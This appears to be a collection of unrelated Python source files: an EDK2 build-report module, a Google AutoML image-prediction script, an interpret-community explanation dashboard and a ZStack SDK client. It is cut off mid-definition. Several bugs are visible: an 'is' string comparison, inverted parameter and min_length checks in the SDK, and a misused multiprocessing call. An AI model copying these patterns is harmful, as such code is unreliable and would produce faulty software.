# # @param self The object pointer # @param Fd The current Firmware device object # @param Wa Workspace context information # def __init__(self, Fd, Wa): self.FdName = Fd.FdUiName self.BaseAddress = Fd.BaseAddress self.Size = Fd.Size self.FdRegionList = [FdRegionReport(FdRegion, Wa) for FdRegion in Fd.RegionList] self.FvPath = os.path.join(Wa.BuildDir, "FV") self.VpdFilePath = os.path.join(self.FvPath, "%s.map" % Wa.Platform.VpdToolGuid) self.VPDBaseAddress = 0 self.VPDSize = 0 self.VPDInfoList = [] for index, FdRegion in enumerate(Fd.RegionList): if str(FdRegion.RegionType) is 'FILE' and Wa.Platform.VpdToolGuid in str(FdRegion.RegionDataList): self.VPDBaseAddress = self.FdRegionList[index].BaseAddress self.VPDSize = self.FdRegionList[index].Size break if os.path.isfile(self.VpdFilePath): fd = open(self.VpdFilePath, "r") Lines = fd.readlines() for Line in Lines: Line = Line.strip() if len(Line) == 0 or Line.startswith("#"): continue try: PcdName, SkuId, Offset, Size, Value = Line.split("#")[0].split("|") PcdName, SkuId, Offset, Size, Value = PcdName.strip(), SkuId.strip(), Offset.strip(), Size.strip(), Value.strip() if Offset.lower().startswith('0x'): Offset = '0x%08X' % (int(Offset, 16) + self.VPDBaseAddress) else: Offset = '0x%08X' % (int(Offset, 10) + self.VPDBaseAddress) self.VPDInfoList.append("%s | %s | %s | %s | %s" % (PcdName, SkuId, Offset, Size, Value)) except: EdkLogger.error("BuildReport", CODE_ERROR, "Fail to parse VPD information file %s" % self.VpdFilePath) fd.close() ## # Generate report for the firmware device. # # This function generates report for the firmware device. # # @param self The object pointer # @param File The file object for report # def GenerateReport(self, File): FileWrite(File, gSectionStart) FileWrite(File, "Firmware Device (FD)") FileWrite(File, "FD Name: %s" % self.FdName) FileWrite(File, "Base Address: %s" % self.BaseAddress) FileWrite(File, "Size: 0x%X (%.0fK)" % (self.Size, self.Size / 1024.0)) if len(self.FdRegionList) > 0: FileWrite(File, gSectionSep) for FdRegionItem in self.FdRegionList: FdRegionItem.GenerateReport(File) if len(self.VPDInfoList) > 0: FileWrite(File, gSubSectionStart) FileWrite(File, "FD VPD Region") FileWrite(File, "Base Address: 0x%X" % self.VPDBaseAddress) FileWrite(File, "Size: 0x%X (%.0fK)" % (self.VPDSize, self.VPDSize / 1024.0)) FileWrite(File, gSubSectionSep) for item in self.VPDInfoList: ValueList = item.split('|') Value = ValueList[-1].strip() IsByteArray, ArrayList = ByteArrayForamt(Value) if IsByteArray: ValueList[-1] = ' {' FileWrite(File, '|'.join(ValueList)) for Array in ArrayList: FileWrite(File, '%s' % (Array)) else: FileWrite(File, item) FileWrite(File, gSubSectionEnd) FileWrite(File, gSectionEnd) ## # Reports platform information # # This class reports the whole platform information # class PlatformReport(object): ## # Constructor function for class PlatformReport # # This constructor function generates PlatformReport object a platform build. # It generates report for platform summary, flash, global PCDs and detailed # module information for modules involved in platform build. 
# # @param self The object pointer # @param Wa Workspace context information # @param MaList The list of modules in the platform build # def __init__(self, Wa, MaList, ReportType): self._WorkspaceDir = Wa.WorkspaceDir self.PlatformName = Wa.Name self.PlatformDscPath = Wa.Platform self.Architectures = " ".join(Wa.ArchList) self.ToolChain = Wa.ToolChain self.Target = Wa.BuildTarget self.OutputPath = os.path.join(Wa.WorkspaceDir, Wa.OutputDir) self.BuildEnvironment = platform.platform() self.PcdReport = None if "PCD" in ReportType: self.PcdReport = PcdReport(Wa) self.FdReportList = [] if "FLASH" in ReportType and Wa.FdfProfile and MaList is None: for Fd in Wa.FdfProfile.FdDict: self.FdReportList.append(FdReport(Wa.FdfProfile.FdDict[Fd], Wa)) self.PredictionReport = None if "FIXED_ADDRESS" in ReportType or "EXECUTION_ORDER" in ReportType: self.PredictionReport = PredictionReport(Wa) self.DepexParser = None if "DEPEX" in ReportType: self.DepexParser = DepexParser(Wa) self.ModuleReportList = [] if MaList is not None: self._IsModuleBuild = True for Ma in MaList: self.ModuleReportList.append(ModuleReport(Ma, ReportType)) else: self._IsModuleBuild = False for Pa in Wa.AutoGenObjectList: ModuleAutoGenList = [] for ModuleKey in Pa.Platform.Modules: ModuleAutoGenList.append(Pa.Platform.Modules[ModuleKey].M) if GlobalData.gFdfParser is not None: if Pa.Arch in GlobalData.gFdfParser.Profile.InfDict: INFList = GlobalData.gFdfParser.Profile.InfDict[Pa.Arch] for InfName in INFList: InfClass = PathClass(NormPath(InfName), Wa.WorkspaceDir, Pa.Arch) Ma = ModuleAutoGen(Wa, InfClass, Pa.BuildTarget, Pa.ToolChain, Pa.Arch, Wa.MetaFile) if Ma is None: continue if Ma not in ModuleAutoGenList: ModuleAutoGenList.append(Ma) for MGen in ModuleAutoGenList: self.ModuleReportList.append(ModuleReport(MGen, ReportType)) ## # Generate report for the whole platform. # # This function generates report for platform information. # It comprises of platform summary, global PCD, flash and # module list sections. 
# # @param self The object pointer # @param File The file object for report # @param BuildDuration The total time to build the modules # @param AutoGenTime The total time of AutoGen Phase # @param MakeTime The total time of Make Phase # @param GenFdsTime The total time of GenFds Phase # @param ReportType The kind of report items in the final report file # def GenerateReport(self, File, BuildDuration, AutoGenTime, MakeTime, GenFdsTime, ReportType): FileWrite(File, "Platform Summary") FileWrite(File, "Platform Name: %s" % self.PlatformName) FileWrite(File, "Platform DSC Path: %s" % self.PlatformDscPath) FileWrite(File, "Architectures: %s" % self.Architectures) FileWrite(File, "Tool Chain: %s" % self.ToolChain) FileWrite(File, "Target: %s" % self.Target) if GlobalData.gSkuids: FileWrite(File, "SKUID: %s" % " ".join(GlobalData.gSkuids)) if GlobalData.gDefaultStores: FileWrite(File, "DefaultStore: %s" % " ".join(GlobalData.gDefaultStores)) FileWrite(File, "Output Path: %s" % self.OutputPath) FileWrite(File, "Build Environment: %s" % self.BuildEnvironment) FileWrite(File, "Build Duration: %s" % BuildDuration) if AutoGenTime: FileWrite(File, "AutoGen Duration: %s" % AutoGenTime) if MakeTime: FileWrite(File, "Make Duration: %s" % MakeTime) if GenFdsTime: FileWrite(File, "GenFds Duration: %s" % GenFdsTime) FileWrite(File, "Report Content: %s" % ", ".join(ReportType)) if GlobalData.MixedPcd: FileWrite(File, gSectionStart) FileWrite(File, "The following PCDs use different access methods:") FileWrite(File, gSectionSep) for PcdItem in GlobalData.MixedPcd: FileWrite(File, "%s.%s" % (str(PcdItem[1]), str(PcdItem[0]))) FileWrite(File, gSectionEnd) if not self._IsModuleBuild: if "PCD" in ReportType: self.PcdReport.GenerateReport(File, None) if "FLASH" in ReportType: for FdReportListItem in self.FdReportList: FdReportListItem.GenerateReport(File) for ModuleReportItem in self.ModuleReportList: ModuleReportItem.GenerateReport(File, self.PcdReport, self.PredictionReport, self.DepexParser, ReportType) if not self._IsModuleBuild: if "EXECUTION_ORDER" in ReportType: self.PredictionReport.GenerateReport(File, None) ## BuildReport class # # This base class contain the routines to collect data and then # applies certain format to the output report # class BuildReport(object): ## # Constructor function for class BuildReport # # This constructor function generates BuildReport object a platform build. # It generates report for platform summary, flash, global PCDs and detailed # module information for modules involved in platform build. # # @param self The object pointer # @param ReportFile The file name to save report file # @param ReportType The kind of report items in the final report file # def __init__(self, ReportFile, ReportType): self.ReportFile = ReportFile if ReportFile: self.ReportList = [] self.ReportType = [] if ReportType: for ReportTypeItem in ReportType: if ReportTypeItem not in self.ReportType: self.ReportType.append(ReportTypeItem) else: self.ReportType = ["PCD", "LIBRARY", "BUILD_FLAGS", "DEPEX", "HASH", "FLASH", "FIXED_ADDRESS"] ## # Adds platform report to the list # # This function adds a platform report to the final report list. # # @param self The object pointer # @param Wa Workspace context information # @param MaList The list of modules in the platform build # def AddPlatformReport(self, Wa, MaList=None): if self.ReportFile: self.ReportList.append((Wa, MaList)) ## # Generates the final report. # # This function generates platform build report. 
It invokes GenerateReport() # method for every platform report in the list. # # @param self The object pointer # @param BuildDuration The total time to build the modules # @param AutoGenTime The total time of AutoGen phase # @param MakeTime The total time of Make phase # @param GenFdsTime The total time of GenFds phase # def GenerateReport(self, BuildDuration, AutoGenTime, MakeTime, GenFdsTime): if self.ReportFile: try: File = StringIO('') for (Wa, MaList) in self.ReportList: PlatformReport(Wa, MaList, self.ReportType).GenerateReport(File, BuildDuration, AutoGenTime, MakeTime, GenFdsTime, self.ReportType) Content = FileLinesSplit(File.getvalue(), gLineMaxLength) SaveFileOnChange(self.ReportFile, Content, True) EdkLogger.quiet("Build report can be found at %s" % os.path.abspath(self.ReportFile)) except IOError: EdkLogger.error(None, FILE_WRITE_FAILURE, ExtraData=self.ReportFile) except: EdkLogger.error("BuildReport", CODE_ERROR, "Unknown fatal error when generating build report", ExtraData=self.ReportFile, RaiseError=False) EdkLogger.quiet("(Python %s on %s\n%s)" % (platform.python_version(), sys.platform, traceback.format_exc())) File.close() # This acts like the main() function for the script, unless it is 'import'ed into another script. if __name__ == '__main__': pass
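# --- Illustrative usage sketch (added for clarity; not part of the original
# BuildReport.py). A minimal, hedged example of the BuildReport lifecycle
# defined above: construct it with a report file and report types, register a
# platform workspace, then render the report. The `Wa` workspace autogen
# object and the duration strings are placeholders that the real build entry
# point supplies.
def _example_build_report(Wa):
    report = BuildReport("BuildReport.txt", ["PCD", "FLASH", "DEPEX"])
    report.AddPlatformReport(Wa, MaList=None)
    report.GenerateReport("00:05:42", "00:01:10", "00:03:55", "00:00:37")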
predictBlock.py
# TODO(developer): Uncomment and set the following variables from multiprocessing import Process import os import CloudServiceConfig as config from google.cloud import automl_v1beta1 as automl from google.cloud import vision import Blocks os.environ["GOOGLE_APPLICATION_CREDENTIALS"] = config.conf['service_API_Path'] project_id = config.conf['project_id'] compute_region = config.conf['compute_region'] model_id = config.conf['model_id'] thresh = config.conf["thresh"] def detect_document(path): """Detects document features in an image.""" from google.cloud import vision client = vision.ImageAnnotatorClient() with open(path, 'rb') as image_file: content = image_file.read() image = vision.types.Image(content=content) response = client.document_text_detection(image=image) for page in response.full_text_annotation.pages: for block in page.blocks: print('\nBlock confidence: {}\n'.format(block.confidence)) for paragraph in block.paragraphs: print('Paragraph confidence: {}'.format( paragraph.confidence)) for word in paragraph.words: word_text = ''.join([ symbol.text for symbol in word.symbols ]) print('Word text: {} (confidence: {})'.format( word_text, word.confidence)) for symbol in word.symbols: print('\tSymbol: {} (confidence: {})'.format( symbol.text, symbol.confidence)) def detect_crop_hints(path): """Detects crop hints in an image.""" from google.cloud import vision client = vision.ImageAnnotatorClient() with open(path, 'rb') as image_file: content = image_file.read() image = vision.types.Image(content=content) crop_hints_params = vision.types.CropHintsParams(aspect_ratios=[1.77]) image_context = vision.types.ImageContext( crop_hints_params=crop_hints_params) response = client.crop_hints(image=image, image_context=image_context) hints = response.crop_hints_annotation.crop_hints for n, hint in enumerate(hints): print('\nCrop Hint: {}'.format(n)) vertices = (['({},{})'.format(vertex.x, vertex.y) for vertex in hint.bounding_poly.vertices]) print('bounds: {}'.format(','.join(vertices))) def localize_objects(path): """Localize objects in the local image. Args: path: The path to the local file. """ client = vision.ImageAnnotatorClient() with open(path, 'rb') as image_file: content = image_file.read() image = vision.types.Image(content=content) objects = client.object_localization( image=image).localized_object_annotations print('Number of objects found: {}'.format(len(objects))) for object_ in objects: print('\n{} (confidence: {})'.format(object_.name, object_.score)) print('Normalized bounding polygon vertices: ') for vertex in object_.bounding_poly.normalized_vertices: print(' - ({}, {})'.format(vertex.x, vertex.y)) def predict(project_id, compute_region, model_id, file_path): multilabel = True # for multilabel or False for multiclass client = vision.ImageAnnotatorClient() automl_client = automl.AutoMlClient() # Get the full path of the model. model_full_id = automl_client.model_path( project_id, compute_region, model_id ) # Create client for prediction service. prediction_client = automl.PredictionServiceClient() # Read the image and assign to payload. with open(file_path, "rb") as image_file: content = image_file.read() payload = {"image": {"image_bytes": content}} image = vision.types.Image(content=content) # params is additional domain-specific parameters. 
# score_threshold is used to filter the result # Initialize params # params = {} # if thresh: params = {"score_threshold": thresh} response = prediction_client.predict(model_full_id, payload, params) prediction = [] for result in response.payload: # print("Predicted class name: {}".format(result.display_name)) # print("Predicted class score: {}".format(result.classification.score)) temp = [result.display_name, result.classification.score] prediction.append(temp) # print("=================") return prediction def imageOnReady(blocks): # print("Ready for AI") # os.chdir('..') for i in blocks.blocks: ImgPath = blocks.getBlockByID(i).getImagePath() Process(target=blocks.getBlockByID(i).setPrediction(predict(project_id, compute_region, model_id, ImgPath))).start() # getBlockByID(i).setPrediction(predict(project_id, compute_region, model_id, ImgPath)) # for i in blocks.blocks: # print("Block ", i, " ID: :", blocks.getBlockByID(i).getBlockID()) # print("Block ", i, " X Location: :", blocks.getBlockByID(i).getX_Location()) # print("Block ", i, " Y Location: :", blocks.getBlockByID(i).getY_Location()) # print("Block ", i, " Width: :", blocks.getBlockByID(i).get_Width()) # print("Block ", i, " Height: :", blocks.getBlockByID(i).get_Height()) # print("Block ", i, " Image Path :", blocks.getBlockByID(i).getImagePath()) # print("Block ", i, " Prediction: :", blocks.getBlockByID(i).getPrediction()) # print("Block ", i, " BEST Prediction: :", blocks.getBlockByID(i).getBestPrediction()) # print("Block ", i, " Second BEST Prediction: :", blocks.getBlockByID(i).getScondBest()) # print("========================================================================")
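# --- Illustrative sketch (added for clarity; not part of the original file).
# A hedged alternative to the imageOnReady() loop above: Process(target=f(x))
# evaluates f(x) in the parent and hands its return value to Process, so
# nothing useful runs in the child. The sketch below runs predict() in worker
# processes via a Pool and assigns the results back on the Block objects in
# the parent, using only the Blocks accessors already used above.
from multiprocessing import Pool


def imageOnReadyParallelSketch(blocks):
    block_ids = list(blocks.blocks)
    image_paths = [blocks.getBlockByID(i).getImagePath() for i in block_ids]
    with Pool() as pool:
        # Each worker runs one AutoML prediction for one block image
        results = pool.starmap(
            predict,
            [(project_id, compute_region, model_id, path) for path in image_paths])
    # Mutations made inside child processes are not visible to the parent,
    # so the predictions are stored here, in the parent process
    for block_id, result in zip(block_ids, results):
        blocks.getBlockByID(block_id).setPrediction(result)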
explanation_dashboard.py
from flask import Flask, request from flask_cors import CORS from jinja2 import Environment, PackageLoader from IPython.display import display, HTML from interpret.utils.environment import EnvironmentDetector, is_cloud_env import threading import socket import requests import re import os import json import atexit from .explanation_dashboard_input import ExplanationDashboardInput from ._internal.constants import DatabricksInterfaceConstants try: from gevent.pywsgi import WSGIServer except ModuleNotFoundError: raise RuntimeError("Error: gevent package is missing, please run 'conda install gevent' or" "'pip install gevent' or 'pip install interpret-community[visualization]'") class ExplanationDashboard: """Explanation Dashboard Class. :param explanation: An object that represents an explanation. :type explanation: ExplanationMixin :param model: An object that represents a model. It is assumed that for the classification case it has a method of predict_proba() returning the prediction probabilities for each class and for the regression case a method of predict() returning the prediction value. :type model: object :param dataset: A matrix of feature vector examples (# examples x # features), the same samples used to build the explanation. Overwrites any existing dataset on the explanation object. :type dataset: numpy.array or list[][] :param true_y: The true labels for the provided dataset. Overwrites any existing dataset on the explanation object. :type true_y: numpy.array or list[] :param classes: The class names. :type classes: numpy.array or list[] :param features: Feature names. :type features: numpy.array or list[] :param port: The port to use on locally hosted service. :type port: int :param use_cdn: Whether to load latest dashboard script from cdn, fall back to local script if False. :type use_cdn: bool """ service = None explanations = {} model_count = 0 using_fallback = False _cdn_path = "v0.2.js" _dashboard_js = None env = Environment(loader=PackageLoader(__name__, 'templates')) default_template = env.get_template("inlineDashboard.html") class DashboardService: app = Flask(__name__) CORS(app) def __init__(self, port): self.port = port self.ip = 'localhost' self.env = "local" self.use_cdn = True if self.port is None: # Try 100 different ports for port in range(5000, 5100): available = ExplanationDashboard.DashboardService._local_port_available(self.ip, port, rais=False) if available: self.port = port return error_message = """Ports 5000 to 5100 not available. 
Please specify an open port for use via the 'port' parameter""" raise RuntimeError( error_message.format(port) ) else: ExplanationDashboard.DashboardService._local_port_available(self.ip, self.port) def run(self): class devnull: write = lambda _: None # noqa: E731 server = WSGIServer((self.ip, self.port), self.app, log=devnull) self.app.config["server"] = server server.serve_forever() # Closes server on program exit, including freeing all sockets def closeserver(): server.stop() atexit.register(closeserver) def get_base_url(self): env = EnvironmentDetector() detected_envs = env.detect() in_cloud_env = is_cloud_env(detected_envs) # First handle known cloud environments nbvm_file_path = "/mnt/azmnt/.nbvm" if not (os.path.exists(nbvm_file_path) and os.path.isfile(nbvm_file_path)): if not in_cloud_env: return "http://{0}:{1}".format( self.ip, self.port) # all non-specified cloud environments are not handled self.env = "cloud" return None self.env = "cloud" # regex to find items of the form key=value where value will be part of a url # the keys of interest to us are "instance" and domainsuffix" envre = re.compile(r'''^([^\s=]+)=(?:[\s"']*)(.+?)(?:[\s"']*)$''') result = {} with open(nbvm_file_path) as nbvm_variables: for line in nbvm_variables: match = envre.match(line) if match is not None: result[match.group(1)] = match.group(2) if "instance" not in result or "domainsuffix" not in result: return None self.env = "azure" instance_name = result["instance"] domain_suffix = result["domainsuffix"] return "https://{}-{}.{}".format(instance_name, self.port, domain_suffix) @staticmethod def _local_port_available(ip, port, rais=True): """ Borrowed from: https://stackoverflow.com/questions/19196105/how-to-check-if-a-network-port-is-open-on-linux """ try: backlog = 5 sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.bind((ip, port)) sock.listen(backlog) sock.close() except socket.error: # pragma: no cover if rais: error_message = """Port {0} is not available. Please specify another port for use via the 'port' parameter""" raise RuntimeError( error_message.format(port) ) else: return False return True @app.route('/') def hello(): return "No global list view supported at this time." @app.route('/<id>') def explanation_visual(id): if id in ExplanationDashboard.explanations: return generate_inline_html(ExplanationDashboard.explanations[id], None) else: return "Unknown model id." 
@app.route('/<id>/predict', methods=['POST']) def predict(id): data = request.get_json(force=True) if id in ExplanationDashboard.explanations: return ExplanationDashboard.explanations[id].on_predict(data) def __init__(self, explanation, model=None, *, dataset=None, true_y=None, classes=None, features=None, port=None, use_cdn=True, datasetX=None, trueY=None, locale=None): # support legacy kwarg names if dataset is None and datasetX is not None: dataset = datasetX if true_y is None and trueY is not None: true_y = trueY self._initialize_js(use_cdn) predict_url = None local_url = None if not ExplanationDashboard.service: try: ExplanationDashboard.service = ExplanationDashboard.DashboardService(port) self._thread = threading.Thread(target=ExplanationDashboard.service.run, daemon=True) self._thread.start() except Exception as e: ExplanationDashboard.service = None raise e ExplanationDashboard.service.use_cdn = use_cdn ExplanationDashboard.model_count += 1 base_url = ExplanationDashboard.service.get_base_url() if base_url is not None: predict_url = "{0}/{1}/predict".format( base_url, str(ExplanationDashboard.model_count)) local_url = "{0}/{1}".format( base_url, str(ExplanationDashboard.model_count)) explanation_input =\ ExplanationDashboardInput(explanation, model, dataset, true_y, classes, features, predict_url, locale) # Due to auth, predict is only available in separate tab in cloud after login if ExplanationDashboard.service.env == "local": explanation_input.enable_predict_url() html = generate_inline_html(explanation_input, local_url) if ExplanationDashboard.service.env == "azure": explanation_input.enable_predict_url() ExplanationDashboard.explanations[str(ExplanationDashboard.model_count)] = explanation_input if "DATABRICKS_RUNTIME_VERSION" in os.environ: _render_databricks(html) else: display(HTML(html)) def _initialize_js(self, use_cdn): if (ExplanationDashboard._dashboard_js is None): if (use_cdn): try: url = 'https://interpret-cdn.azureedge.net/{0}'.format(ExplanationDashboard._cdn_path) r = requests.get(url) if not r.ok: ExplanationDashboard.using_fallback = True self._load_local_js() r.encoding = "utf-8" ExplanationDashboard._dashboard_js = r.text except Exception: ExplanationDashboard.using_fallback = True self._load_local_js() else: self._load_local_js() def _load_local_js(self): script_path = os.path.dirname(os.path.abspath(__file__)) js_path = os.path.join(script_path, "static", "index.js") with open(js_path, "r", encoding="utf-8") as f: ExplanationDashboard._dashboard_js = f.read() def generate_inline_html(explanation_input_object, local_url): explanation_input = json.dumps(explanation_input_object.dashboard_input) return ExplanationDashboard.default_template.render(explanation=explanation_input, main_js=ExplanationDashboard._dashboard_js, app_id='app_123', using_fallback=ExplanationDashboard.using_fallback, local_url=local_url, has_local_url=local_url is not None) # NOTE: Code mostly derived from Plotly's databricks render as linked below: # https://github.com/plotly/plotly.py/blob/01a78d3fdac14848affcd33ddc4f9ec72d475232/packages/python/plotly/plotly/io/_base_renderers.py def _render_databricks(html): # pragma: no cover import inspect if _render_databricks.displayHTML is None: found = False for frame in inspect.getouterframes(inspect.currentframe()): global_names = set(frame.frame.f_globals) target_names = {DatabricksInterfaceConstants.DISPLAY_HTML, DatabricksInterfaceConstants.DISPLAY, DatabricksInterfaceConstants.SPARK} if target_names.issubset(global_names): 
                _render_databricks.displayHTML = frame.frame.f_globals[
                    DatabricksInterfaceConstants.DISPLAY_HTML]
                found = True
                break

        if not found:
            msg = "Could not find Databricks' displayHTML function"
            raise RuntimeError(msg)

    _render_databricks.displayHTML(html)


_render_databricks.displayHTML = None
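# --- Illustrative usage sketch (added for clarity; not part of the original
# file). A minimal, hedged example of launching the dashboard class defined
# above. `global_explanation`, `model`, `x_test` and `y_test` are placeholders
# for objects produced elsewhere (any ExplanationMixin explanation and its
# evaluation data), and the class names are illustrative; only constructor
# arguments documented in the class docstring above are used.
def _example_dashboard(global_explanation, model, x_test, y_test):
    ExplanationDashboard(global_explanation, model,
                         dataset=x_test, true_y=y_test,
                         classes=["negative", "positive"], port=5002)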
zssdk.py
import re import sys try: import urllib3 except ImportError: print 'urlib3 is not installed, run "pip install urlib3"' sys.exit(1) import string import json from uuid import uuid4 import time import threading import functools import traceback import base64 import hmac import sha from hashlib import sha1 import datetime import time CONFIG_HOSTNAME = 'hostname' CONFIG_PORT = 'port' CONFIG_POLLING_TIMEOUT = 'default_polling_timeout' CONFIG_POLLING_INTERVAL = 'default_polling_interval' CONFIG_WEBHOOK = 'webhook' CONFIG_READ_TIMEOUT = 'read_timeout' CONFIG_WRITE_TIMEOUT = 'write_timeout' CONFIG_CONTEXT_PATH = 'context_path' HEADER_JOB_UUID = "X-Job-UUID" HEADER_WEBHOOK = "X-Web-Hook" HEADER_JOB_SUCCESS = "X-Job-Success" HEADER_AUTHORIZATION = "Authorization" HEADER_REQUEST_IP = "X-Request-Ip"; OAUTH = "OAuth" LOCATION = "location" HTTP_ERROR = "sdk.1000" POLLING_TIMEOUT_ERROR = "sdk.1001" INTERNAL_ERROR = "sdk.1002" __config__ = {} class SdkError(Exception): pass def _exception_safe(func): @functools.wraps(func) def wrap(*args, **kwargs): try: func(*args, **kwargs) except: print traceback.format_exc() return wrap def _error_if_not_configured(): if not __config__: raise SdkError('call configure() before using any APIs') def _http_error(status, body=None): err = ErrorCode() err.code = HTTP_ERROR err.description = 'the http status code[%s] indicates a failure happened' % status err.details = body return {'error': err} def _error(code, desc, details): err = ErrorCode() err.code = code err.desc = desc err.details = details return {'error': err} def configure( hostname='127.0.0.1', context_path = None, port=8080, polling_timeout=3600*3, polling_interval=1, read_timeout=15, write_timeout=15, web_hook=None ): __config__[CONFIG_HOSTNAME] = hostname __config__[CONFIG_PORT] = port __config__[CONFIG_POLLING_TIMEOUT] = polling_timeout __config__[CONFIG_POLLING_INTERVAL] = polling_interval __config__[CONFIG_WEBHOOK] = web_hook __config__[CONFIG_READ_TIMEOUT] = read_timeout __config__[CONFIG_WRITE_TIMEOUT] = write_timeout __config__[CONFIG_CONTEXT_PATH] = context_path class ParamAnnotation(object): def __init__( self, required=False, valid_values=None, valid_regex_values=None, max_length=None, min_length=None, non_empty=None, null_elements=None, empty_string=None, number_range=None, no_trim=False ): self.required = required self.valid_values = valid_values self.valid_regex_values = valid_regex_values self.max_length = max_length self.min_length = min_length self.non_empty = non_empty self.null_elements = null_elements self.empty_string = empty_string self.number_range = number_range self.no_trim = no_trim class ErrorCode(object): def __init__(self): self.code = None self.description = None self.details = None self.cause = None class Obj(object): def __init__(self, d): for a, b in d.items(): if isinstance(b, (list, tuple)): setattr(self, a, [Obj(x) if isinstance(x, dict) else x for x in b]) else: setattr(self, a, Obj(b) if isinstance(b, dict) else b) def __getattr__(self, item): return None class AbstractAction(object): def __init__(self): self.apiId = None self.sessionId = None self.requestIp = None self.systemTags = None self.userTags = None self.timeout = None self.pollingInterval = None self._param_descriptors = { 'systemTags': ParamAnnotation(), 'userTags': ParamAnnotation() } self._param_descriptors.update(self.PARAMS) def _check_params(self): for param_name, annotation in self._param_descriptors.items(): value = getattr(self, param_name, None) if value is None and annotation.required: raise 
SdkError('missing a mandatory parameter[%s]' % param_name) if value is not None and annotation.valid_values and value not in annotation.valid_values: raise SdkError('invalid parameter[%s], the value[%s] is not in the valid options%s' % (param_name, value, annotation.valid_values)) if value is not None and isinstance(value, str) and annotation.max_length and len(value) > annotation.max_length: raise SdkError('invalid length[%s] of the parameter[%s], the max allowed length is %s' % (len(value), param_name, annotation.max_length)) if value is not None and isinstance(value, str) and annotation.min_length and len(value) > annotation.min_length: raise SdkError('invalid length[%s] of the parameter[%s], the minimal allowed length is %s' % (len(value), param_name, annotation.min_length)) if value is not None and isinstance(value, list) and annotation.non_empty is True and len(value) == 0: raise SdkError('invalid parameter[%s], it cannot be an empty list' % param_name) if value is not None and isinstance(value, list) and annotation.null_elements is True and None in value: raise SdkError('invalid parameter[%s], the list cannot contain a null element' % param_name) if value is not None and isinstance(value, str) and annotation.empty_string is False and len(value) == 0: raise SdkError('invalid parameter[%s], it cannot be an empty string' % param_name) if value is not None and (isinstance(value, int) or isinstance(value, long)) \ and annotation.number_range is not None and len(annotation.number_range) == 2: low = annotation.number_range[0] high = annotation.number_range[1] if value < low or value > high: raise SdkError('invalid parameter[%s], its value is not in the valid range' % annotation.number_range) if value is not None and isinstance(value, str) and annotation.no_trim is False: value = str(value).strip() setattr(self, param_name, value) if self.NEED_SESSION: if self.sessionId is None and (self.accessKeyId is None or self.accessKeySecret is None): raise SdkError('sessionId or accessKey must be provided') def _params(self): ret = {} for k, _ in self._param_descriptors.items(): val = getattr(self, k, None) if val is not None: ret[k] = val return ret def _query_string(self, params): queryParams = {} for k, v in params.items(): if k == "accessKeySecret": continue if k == "accessKeyId": continue queryParams[k] = v return '&'.join(['%s=%s' % (k, v) for k, v in queryParams.items()]) def _url(self): elements = ['http://', __config__[CONFIG_HOSTNAME], ':', str(__config__[CONFIG_PORT])] context_path = __config__.get(CONFIG_CONTEXT_PATH, None) if context_path is not None: elements.append(context_path) elements.append('/v1') path = self.PATH.replace('{', '${') unresolved = re.findall('${(.+?)}', path) params = self._params() if unresolved: for u in unresolved: if u in params: raise SdkError('missing a mandatory parameter[%s]' % u) path = string.Template(path).substitute(params) elements.append(path) if self.HTTP_METHOD == 'GET' or self.HTTP_METHOD == 'DELETE': elements.append('?') elements.append(self._query_string(params)) return ''.join(elements), unresolved def calculateAccessKey(self, url, date): # url example: http://127.0.0.1:8080/zstack/v1/vminstances/uuid?xx elements = url.split(":") path = elements[2].split("/", 2) path = path[2].split("?") h = hmac.new(self.accessKeySecret, self.HTTP_METHOD + "\n" + date + "\n" + "/" + path[0], sha1) Signature = base64.b64encode(h.digest()) return "ZStack %s:%s" % (self.accessKeyId, Signature) def call(self, cb=None): def _return(result): if cb: cb(result) else: 
return result _error_if_not_configured() self._check_params() url, params_in_url = self._url() headers = {} if self.apiId is not None: headers[HEADER_JOB_UUID] = self.apiId else: headers[HEADER_JOB_UUID] = _uuid() date = time.time() datestr = datetime.datetime.fromtimestamp(date).strftime('%a, %d %b %Y %H:%M:%S CST') if self.requestIp is not None: headers[HEADER_REQUEST_IP] = self.requestIp if self.NEED_SESSION: if self.sessionId is not None: headers[HEADER_AUTHORIZATION] = "%s %s" % (OAUTH, self.sessionId) else : headers["Date"] = datestr headers[HEADER_AUTHORIZATION] = self.calculateAccessKey(url, datestr) web_hook = __config__.get(CONFIG_WEBHOOK, None) if web_hook is not None: headers[CONFIG_WEBHOOK] = web_hook params = self._params() body = None if self.HTTP_METHOD == 'POST' or self.HTTP_METHOD == 'PUT': m = {} for k, v in params.items(): if v is None: continue if k == 'sessionId': continue if k == 'accessKeyId': continue if k == 'accessKeySecret': continue if k in params_in_url: continue m[k] = v body = {self.PARAM_NAME: m} if not self.timeout: self.timeout = __config__[CONFIG_READ_TIMEOUT] rsp = _json_http(uri=url, body=body, headers=headers, method=self.HTTP_METHOD, timeout=self.timeout) if rsp.status < 200 or rsp.status >= 300: return _return(Obj(_http_error(rsp.status, rsp.data))) elif rsp.status == 200 or rsp.status == 204: # the API completes return _return(Obj(self._write_result(rsp))) elif rsp.status == 202: # the API needs polling return self._poll_result(rsp, cb) else: raise SdkError('[Internal Error] the server returns an unknown status code[%s], body[%s]' % (rsp.status, rsp.data)) def _write_result(self, rsp): data = rsp.data if not data: data = '{}' if rsp.status == 200: return {"value": json.loads(data)} elif rsp.status == 503: return json.loads(data) else: raise SdkError('unknown status code[%s]' % rsp.status) def _poll_result(self, rsp, cb): if not self.NEED_POLL: raise SdkError('[Internal Error] the api is not an async API but the server returns 202 status code') m = json.loads(rsp.data) location = m[LOCATION] if not location: raise SdkError("Internal Error] the api[%s] is an async API but the server doesn't return the polling location url") if cb: # async polling self._async_poll(location, cb) else: # sync polling return self._sync_polling(location) def _fill_timeout_parameters(self): if self.timeout is None: self.timeout = __config__.get(CONFIG_POLLING_TIMEOUT) if self.pollingInterval is None: self.pollingInterval = __config__.get(CONFIG_POLLING_INTERVAL) def _async_poll(self, location, cb): @_exception_safe def _polling(): ret = self._sync_polling(location) cb(ret) threading.Thread(target=_polling).start() def _sync_polling(self, location): count = 0 self._fill_timeout_parameters() while count < self.timeout: rsp = _json_http( uri=location, headers={HEADER_AUTHORIZATION: "%s %s" % (OAUTH, self.sessionId)}, method='GET' ) if rsp.status not in [200, 503, 202]: return Obj(_http_error(rsp.status, rsp.data)) elif rsp.status in [200, 503]: return Obj(self._write_result(rsp)) time.sleep(self.pollingInterval) count += self.pollingInterval return Obj(_error(POLLING_TIMEOUT_ERROR, 'polling an API result time out', 'failed to poll the result after %s seconds' % self.timeout)) class QueryAction(AbstractAction): PARAMS = { 'conditions': ParamAnnotation(required=True), 'limit': 